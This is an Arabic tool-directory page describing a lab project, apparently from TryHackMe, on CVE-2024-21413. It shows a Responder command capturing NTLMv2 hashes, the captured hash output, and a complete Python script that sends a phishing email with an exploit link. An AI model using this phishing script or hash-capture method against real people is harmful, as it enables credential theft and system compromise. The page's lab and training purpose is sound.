Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Project-NTLM-Hash-Capture-and-Phishing-Email-Exploitation-for-CVE-2024-21413 — أنشئ المشروع لعرض استخدام أدوات متنوعة لالتقاط تجزئات NTLM من المستخدمين على شبكة وتنفيذ هجمات التصيد باستخدام البريد الإلكتروني. يوضح هذا كيف يمكن استغلال ثغرات المصادقة الشبكية وطرق التصيد لاختراق الأنظمة. | Kitploit
أدوات/GitHubGitHub/artemcyberlab/project-ntlm-hash-capture-and-phishing-email-exploitation-for-cve-2024-21413
الاستخبارات مفتوحة المصدر (OSINT)كسر كلمات المرورالاستطلاعالاستغلالالتصيد الاحتياليالهندسة الاجتماعيةالتعلم والتعليممختبرات وتدريب عملي

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
artemcyberlab/project-ntlm-hash-capture-and-phishing-email-exploitation-for-cve-2024-21413

Project-NTLM-Hash-Capture-and-Phishing-Email-Exploitation-for-CVE-2024-21413

أنشئ المشروع لعرض استخدام أدوات متنوعة لالتقاط تجزئات NTLM من المستخدمين على شبكة وتنفيذ هجمات التصيد باستخدام البريد الإلكتروني. يوضح هذا كيف يمكن استغلال ثغرات المصادقة الشبكية وطرق التصيد لاختراق الأنظمة.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

هدف المشروع: تم إنشاء المشروع لتوضيح استخدام أدوات متنوعة لالتقاط تجزئات NTLM من المستخدمين على الشبكة وتنفيذ هجمات التصيد باستخدام البريد الإلكتروني. يُظهر ذلك كيف يمكن استغلال ثغرات المصادقة عبر الشبكة وطرق التصيد لاختراق الأنظمة.

وصف العملية

  1. التقاط تجزئات NTLM باستخدام Responder في البداية، استخدمت أداة Responder لالتقاط تجزئات المصادقة عبر الشبكة. تسمح Responder باعتراض الاستعلامات مثل LLMNR وNBT-NS وMDNS لجمع تجزئات NTLM للمستخدمين. هذه خطوة مهمة للهجمات التي تهدف إلى الوصول إلى الأنظمة باستخدام التجزئات الملتقطة.

قمت بتشغيل الأمر التالي لبدء Responder:

root@ip-10-10-192-145:~# sudo responder -I ens5

قمت بتكوين Responder للاستماع على واجهة ens5. بدأت على الفور في اعتراض طلبات المصادقة، مما سمح لي برؤية تجزئات NTLM من المستخدمين على الشبكة، مثل THM-MONIKERLINK\tryhackme وWORKGROUP\Administrator. إليك كيف بدا المخرجات عند التقاط التجزئات:

[SMB] NTLMv2-SSP Client : ::ffff:10.10.251.212 [SMB] NTLMv2-SSP Username : THM-MONIKERLINK\tryhackme [SMB] NTLMv2-SSP Hash : tryhackme::THM-MONIKERLINK:0b8bfa4ac2e8a954:4E86E98E55FBE019FB31815DDD4445DB

يمكن بعد ذلك استخدام هذه التجزئات في هجمات مثل القوة العمياء أو هجمات التجزئة.

  1. رسائل التصيد الإلكتروني مع الاستغلال بعد ذلك، قمت بإنشاء بريد إلكتروني تصيدي يحتوي على رابط لملف ضار. باستخدام سكريبت Python مع مكتبة smtplib، أرسلت البريد الإلكتروني إلى عنوان الضحية. تضمن البريد رابط HTML بدا آمنًا ولكنه في الواقع يؤدي إلى ملف مصمم لاستغلال ثغرة أمنية.

بدا رابط التصيد في البريد الإلكتروني كما يلي:

اضغط علي

إليك سكريبت Python الكامل المستخدم لإرسال البريد الإلكتروني التصيدي:

import smtplib from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart from email.utils import formataddr

sender_email = '[email protected]' receiver_email = '[email protected]' password = input("Enter your attacker email password: ")

html_content = """\

Click me

"""

message = MIMEMultipart() message['Subject'] = "CVE-2024-21413" message["From"] = formataddr(('CMNatic', sender_email)) message["To"] = receiver_email

msgHtml = MIMEText(html_content, 'html') message.attach(msgHtml)

server = smtplib.SMTP('10.10.251.212 ', 25) server.ehlo()

try: server.login(sender_email, password) except Exception as err: print(err) exit(-1)

try: server.sendmail(sender_email, [receiver_email], message.as_string()) print("\nEmail delivered") except Exception as error: print(error) finally: server.quit()

يرسل هذا السكريبت بريدًا إلكترونيًا يحتوي على رابط ضار، والذي قد يستغل ثغرة CVE-2024-21413.

النتائج نتيجة لذلك، تمكنت من توضيح جانبين رئيسيين:

التقاط تجزئات NTLM باستخدام أداة Responder، وهي خطوة حاسمة لمهاجمة مصادقة الشبكة.

التصيد واستغلال الثغرات عبر البريد الإلكتروني باستخدام سكريبت Python. يمكن لإرسال رسائل التصيد بروابط ضارة أن يخدع المستخدمين ويؤدي إلى اختراق النظام.

أظهر هذا المشروع كيف يمكن استغلال ثغرات الشبكة وهجمات التصيد للوصول إلى الأنظمة. كما أبرز أهمية الدفاع ضد هذه الهجمات من خلال طرق المصادقة القوية وتصفية حركة البريد الإلكتروني.

تنزيل الأداة